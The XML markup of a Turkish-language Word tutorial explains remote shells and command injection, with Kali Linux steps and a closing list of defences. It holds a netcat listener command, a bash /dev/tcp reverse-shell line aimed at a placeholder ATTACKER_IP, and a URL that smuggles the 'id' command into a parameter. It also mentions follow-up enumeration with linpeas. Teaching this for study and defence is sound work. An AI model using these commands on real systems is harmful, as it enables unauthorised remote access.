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629F7" w14:textId="77777777" w:rsidR="003F7603" w:rsidRPr="00B666D9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Remote Shell &amp; Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A49ADD" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Remote Shell, bir saldırganın hedef sistem üzerinde uzaktan terminal erişimi elde etmesini sağlayan bir tekniktir. Bu erişim genellikle zafiyetli sistemler üzerinden gerçekleştirilir ve saldırganın hedef sistemde komut çalıştırmasına, dosya işlemleri yapmasına ve yetki yükseltmesine olanak tanır.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Command Injection (Komut Enjeksiyonu) ise, uygulamanın kullanıcıdan aldığı verileri sistem komutlarına doğrudan aktarması sonucu oluşan kritik bir güvenlik açığıdır. Bu zafiyet sayesinde saldırgan, hedef sistemde keyfi komutlar çalıştırabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D5B141" w14:textId="77777777" w:rsidR="003F7603" w:rsidRPr="00B666D9" w:rsidRDefault="00000000" w:rsidP="00B666D9">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Bu</w:t>
      </w:r>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>tekniğin</w:t>
      </w:r>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>özellikleri</w:t>
      </w:r>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>nelerdir</w:t>
      </w:r>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FDE175" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Uzaktan Komut Çalıştırma: Sistem üzerinde doğrudan terminal komutları yürütülebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BF1872" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Ters Kabuk Erişimi (Reverse Shell): Hedef sistemden saldırgana doğru bağlantı alınarak etkileşimli kabuk sağlanabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0519D08B" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Sistem Kontrolü: Dosya okuma/yazma/silme, kullanıcı işlemleri gibi kritik işlemler yapılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A62132D" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Yetki Yükseltme ve Pivoting: Elde edilen erişim, sistemde daha yüksek ayrıcalıklar veya diğer sistemlere erişim için kullanılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F868568" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Düşük Maliyetli ve Etkili: Komut enjeksiyonu zafiyetleri kolay tespit edilebilir ancak etkileri büyüktür.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B8BB60" w14:textId="77777777" w:rsidR="003F7603" w:rsidRPr="00B666D9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Bu tekniği Kali Linux'ta kullanma adımları:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B4F616" w14:textId="77777777" w:rsidR="00B666D9" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Adım</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sistem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>paket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>listesini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>güncelleyin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F92E7D" w14:textId="165D86E3" w:rsidR="003F7603" w:rsidRDefault="00B666D9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt update --fix-missing</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D95E579" wp14:editId="32FF687F">
            <wp:extent cx="5486400" cy="1328420"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1149826506" name="Resim 2"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6506" name="Resim 2" descr="metin, ekran görüntüsü, yazı tipi içeren bir resim&#10;&#10;Yapay zeka tarafından oluşturulmuş içerik yanlış olabilir."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1328420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D79385D" w14:textId="7E517A50" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Adım 2:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Gerekli aracı (Netcat) yükleyin:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat-openbsd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B666D9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16CE5B7B" wp14:editId="3C95A915">
            <wp:extent cx="5486400" cy="1418590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1532208689" name="Resim 3"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08689" name="Resim 3" descr="metin, ekran görüntüsü, yazı tipi içeren bir resim&#10;&#10;Yapay zeka tarafından oluşturulmuş içerik yanlış olabilir."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1418590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Not: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Eğer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> alırsanız /etc/apt/sources.list dosyasını aşağıdaki gibi düzeltin:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>deb http://http.kali.org/kali kali-rolling main non-free contrib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E744883" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Adım 3:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Saldırgan makinede bağlantı beklemek için netcat dinlemeye alın:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D65523" w14:textId="5556AB57" w:rsidR="00B666D9" w:rsidRDefault="00B666D9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78F801D8" wp14:editId="368795F2">
            <wp:extent cx="3353268" cy="895475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="96163941" name="Resim 4"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3941" name="Resim 4" descr="metin, ekran görüntüsü, yazı tipi içeren bir resim&#10;&#10;Yapay zeka tarafından oluşturulmuş içerik yanlış olabilir."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3353268" cy="895475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0258AD31" w14:textId="77777777" w:rsidR="00B666D9" w:rsidRDefault="00000000">
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Adım 4:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hedef sisteme aşağıdaki ters kabuk (reverse shell) komutu enjekte edilir:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ATTACKER_IP/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0EA5D4" w14:textId="4A522C63" w:rsidR="003F7603" w:rsidRDefault="00B666D9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D7D9C25" wp14:editId="19570C40">
            <wp:extent cx="4039164" cy="647790"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1144905429" name="Resim 5" descr="metin, ekran görüntüsü,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05429" name="Resim 5" descr="metin, ekran görüntüsü, yazı tipi, grafik içeren bir resim&#10;&#10;Yapay zeka tarafından oluşturulmuş içerik yanlış olabilir."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4039164" cy="647790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00000000">
        <w:t>Buradaki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> ATTACKER_IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00000000">
        <w:t>kısmına</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> Kali Linux sisteminizin IP adresini yazın.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FC807E" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Adım 5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Başarılı bağlantı alındıktan sonra, hedef sistemde komut yürütme sağlanır. Gerekirse linpeas, sudo -l, id, uname -a gibi komutlarla sistem analizi yapılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDA50BE" w14:textId="77777777" w:rsidR="003F7603" w:rsidRPr="00B666D9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Command Injection Örneği:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4158633D" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Zafiyetli URL:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>http://hedef.com/page.php?user=admin;id</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Eğer sistem filtreleme yapmıyorsa id komutu çalışır ve çıktısı tarayıcıda görülür.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E3E94F" w14:textId="77777777" w:rsidR="003F7603" w:rsidRPr="00B666D9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B666D9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Önlem Yöntemleri:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207A66D9" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Girdi doğrulama ve filtreleme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C86315" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Parametreleştirme (parametrized commands)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8DE4B6" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Komut satırı erişiminin sınırlandırılması</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8BE9EA" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- WAF (Web Application Firewall) kullanımı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4499A101" w14:textId="77777777" w:rsidR="003F7603" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Whitelist ile giriş kontrolü</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003F7603" w:rsidSect="00034616">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116221002">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1470978944">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1220288783">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1783378926">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1640841142">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="100419445">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="538787908">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="702246991">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="64987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603"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B05BD8"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00B666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3B55C"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{926812FD-AC69-4CA6-9422-0784E9BA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ÖMER FARUK DEMİRCİ</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-31T13:34:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>